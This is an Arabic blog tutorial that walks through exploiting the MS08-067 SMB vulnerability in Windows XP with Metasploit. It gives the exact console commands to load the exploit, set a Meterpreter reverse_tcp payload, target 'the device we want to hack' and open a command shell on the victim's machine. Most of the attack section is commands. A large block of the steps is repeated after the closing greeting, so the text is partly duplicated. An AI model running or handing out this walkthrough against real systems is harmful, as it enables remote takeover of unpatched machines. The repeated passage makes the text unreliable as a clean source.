بسم الله الرحمن الرحيم
كما يعرف الجميع فان ويندوز XP قد تخلت عنه شركة مايكروسوفت و توقفت عن دعمه مما بسبب كثرة ثغراته التي أصبحت منتشرة بشكل كبير و منها هذه الثغرة الموجودة في أغلب الأجهزة من هذا النظام
و أعرف أنها أصبحت ثغرة قديمة و لكن سوف أذكرها للذكرى هي و ثغرات أخرى في هذا الويندوز حتى نقول بعدها أننا نستطيع قراءة الفاتحة على روح المرحوم XP مع أننا طبعا بإمكاننا من الآن قراءتها
سوف يكون الاختبار عن طريق مشروع الميتاسبلويت
أولا : نكتب في الشل في باك تراك
Msfconsole
و ذلك لفتح الميتاسبلويت
.png)
ثانيا : نختار الثغرة عن طريق كتابة الامر التالي :
Use windows/smb/ms08_067_netapi
ثالثا : نختار البايلود و ذلك عن طريق الأمر التالي :
Set payload windows/meterpreter/reverse_tcp
رابعا : نضع عنوان الجهاز الذي نريد اختراقه و ذلك بالأمر التالي :
Set rhost 172.0.0.1
خامسا : نضع عنوان جهازنا (عنوان جهاز المهاجم) بالأمر التالي :
Set lhost 172.0.0.1
طبعا هذه العناوين و هميه قم بتغييرها حسب الأجهزة التي لديك .
سادسا : أكتب هذه الكلمة لتنفيذ الاستغلال أو الثغرة .
Exploit
و شاهد نجاح الاستغلال بالصورة التالية :
الان يمكننا تطبيق أوامر Meterpreter
لاستكمال عملية الاختراق مثلا يمكنك كتابة أمر Shell
حيث سوف يعطيك شل من جهاز الضحية (يعني شاشة الدوس)
شاهد الصورة :
إذن لقد أصبحنا الآن على الجهاز و نستطيع التحكم بأشياء كثيرة .
لكن هذا لا يكفي أنا أعرف أنك تريد معرفة أوامر ال Meterpreter
سوف أشرحها في الدرس القادم انتظرنا لتتعرف عليها .
و السلام عليكم و رحمة الله و بركاته
Set payload windows/meterpreter/reverse_tcp
رابعا : نضع عنوان الجهاز الذي نريد اختراقه و ذلك بالأمر التالي :
Set rhost 172.0.0.1
خامسا : نضع عنوان جهازنا (عنوان جهاز المهاجم) بالأمر التالي :
Set lhost 172.0.0.1
طبعا هذه العناوين و هميه قم بتغييرها حسب الأجهزة التي لديك .
سادسا : أكتب هذه الكلمة لتنفيذ الاستغلال أو الثغرة .
Exploit
و شاهد نجاح الاستغلال بالصورة التالية :
الان يمكننا تطبيق أوامر Meterpreter
لاستكمال عملية الاختراق مثلا يمكنك كتابة أمر Shell
حيث سوف يعطيك شل من جهاز الضحية (يعني شاشة الدوس)
شاهد الصورة :
إذن لقد أصبحنا الآن على الجهاز و نستطيع التحكم بأشياء كثيرة .
لكن هذا لا يكفي أنا أعرف أنك تريد معرفة أوامر ال Meterpreter
سوف أشرحها في الدرس القادم انتظرنا لتتعرف عليها .
و السلام عليكم و رحمة الله و بركاته
Posted in:
backtrack
0 commentaires :
إرسال تعليق